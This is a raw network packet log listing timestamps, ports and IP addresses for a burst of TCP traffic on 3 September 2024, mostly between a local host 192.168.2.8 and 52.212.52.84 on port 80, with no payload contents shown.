Sep 3, 2024 17:13:23.117357016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117367983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117377996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117389917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117408991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117408991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117471933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117471933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117613077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117624998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117697954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117708921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117717981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117729902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117743969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117758989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117758989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117759943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117822886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117852926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117939949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117953062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117964983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117975950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117986917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117997885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118005037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118005037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118047953 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118166924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118256092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118267059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118277073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118288994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118298054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118308067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118316889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118346930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118346930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118396997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118408918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118417978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118424892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118446112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118485928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118498087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118508101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118521929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118522882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118547916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118613005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118772984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118784904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118794918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118804932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118817091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118827105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118838072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118860960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118860960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118860960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118913889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118926048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118936062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.118958950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.118958950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119129896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119187117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119199991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119210958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119337082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119349957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119358063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119366884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119405031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119405031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119564056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119575024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119585037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119609118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.119609118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119646072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119646072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.119761944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.120033979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120045900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120078087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120089054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120098114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120126963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.120161057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120167971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.120168924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.120173931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120186090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.120258093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.120258093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.121864080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.121964931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.121975899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.121985912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.121995926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.122006893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.122039080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.122132063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.122179985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.122190952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.122260094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.122260094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210349083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210371017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210381985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210396051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210407019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210412025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210474014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210477114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210489988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210496902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210500956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210586071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210586071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210757017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210767984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210777044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210800886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210810900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210819960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210839033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210839033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210865974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210884094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210895061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210906029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210917950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.210943937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210974932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.210974932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211605072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211652040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211663008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211720943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211730957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211741924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211755991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211771965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211772919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211783886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211802006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211808920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211817026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211874008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211886883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211898088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211915970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211930990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211945057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.211951017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.211961985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212024927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212035894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212047100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212059021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212063074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212089062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212140083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212526083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212548018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212558985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212625980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212625980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212641954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212652922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212662935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212678909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212713957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212729931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.212735891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.212785959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.213422060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213444948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213455915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213541985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213553905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213577032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.213582039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213594913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213607073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213624954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.213660955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.213660955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.213934898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213946104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213957071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.213969946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214006901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214019060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214029074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214040041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214046955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214046955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214119911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214119911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214133978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214144945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214160919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214173079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214184999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214210033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214210033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214329004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214489937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214502096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214518070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214529037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214540005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214550018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214560986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214570999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214582920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214584112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214584112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214595079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214601040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214610100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214634895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214653015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214653015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214740038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214751959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214762926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214773893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214786053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214795113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214808941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214812040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214845896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214845896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214920998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.214952946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.214989901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215003014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215015888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215029001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215039968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215042114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215042114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215073109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215194941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215207100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215219021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215236902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215236902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215285063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215296030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215305090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215305090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215306044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215318918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215346098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215378046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215378046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215555906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215573072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215584993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215667963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215724945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215734959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215748072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215761900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215774059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215794086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215821028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.215954065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215969086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.215984106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216094017 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216157913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216171980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216183901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216192961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216203928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216216087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216283083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216284037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216451883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216464043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216475010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216505051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216505051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216505051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216559887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216572046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216587067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.216599941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216613054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.216850042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.218249083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218262911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218275070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218293905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218306065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218317032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218328953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.218358994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.218358994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.218395948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.308967113 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:23.309741020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.309788942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.309801102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.309906006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.309920073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.309952974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.309966087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.309999943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310012102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310022116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310050011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.310076952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.310076952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.310317039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310375929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310386896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310759068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310770035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310780048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310798883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.310839891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310852051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.310874939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311141968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311161041 CEST	80	49730	52.212.52.84	192.168.2.8
